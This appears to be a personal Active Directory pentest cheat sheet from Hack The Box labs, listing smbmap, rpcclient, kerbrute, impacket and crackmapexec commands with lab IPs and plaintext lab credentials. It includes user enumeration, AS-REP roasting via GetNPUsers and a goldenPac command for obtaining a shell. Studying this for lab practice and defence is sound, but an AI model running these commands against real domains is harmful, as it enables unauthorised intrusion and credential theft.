Active Directory

Active Directory Tools and Stuff

smbclient

The smbclient utility is the Swiss Army knife of Linux-to-NT tools. This command lets you send messages to workstations, display browse lists and connect to SMB shares

smbmap -H 10.129.148.199
smbclient -N -L //10.129.148.199
smbmap -H 10.10.10.52 -u james -p 'J@m3s_P@ssW0rd!'

rpcclient

rpcclient is a tool for executing client side MS-RPC functions.

Anonymous login

rpcclient -U '' -N 10.129.148.19 # -N for no password -U for username

Login with credentials

$ rpcclient -U htb.local/james 10.129.148.199
Enter HTB.LOCAL\james's password: 
rpcclient $> enumdom
enumdomains    enumdomgroups  enumdomusers   
rpcclient $> enumdom
enumdomains    enumdomgroups  enumdomusers   
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[james] rid:[0x44f]
rpcclient $>

Kerbrute

A tool to quickly bruteforce and enumerate valid Active Directory accounts through Kerberos Pre-Authentication

https://github.com/ropnop/kerbrute

./kerbrute userenum --domain htb.local /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt --dc 10.10.10.52

Impacket-Tools

sudo apt install python3-impacket

To connect mssql

impacket-mssqlclient 'admin:m$$ql_S@_P@ssW0rd!@10.129.148.199'

Dump a list of ASP-REP vulnerable users by credentials with GetNPUsers

impacket-GetNPUsers 'htb.local/james:J@m3s_P@ssW0rd!' -dc-ip 10.129.148.199

Getting a shell with generated kerbrute tickets. (Learn in HTB-Mantis)

impacket-goldenPac 'htb.local/james:J@m3s_P@ssW0rd!@mantis'

Crackmapexec

https://github.com/byt3bl33d3r/CrackMapExec

Documentation: https://mpgn.gitbook.io/crackmapexec/

crackmpexec is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.

Checking valid user for smb

crackmapexec smb 10.129.148.199 -u 'James' -p 'J@m3s_P@ssW0rd!'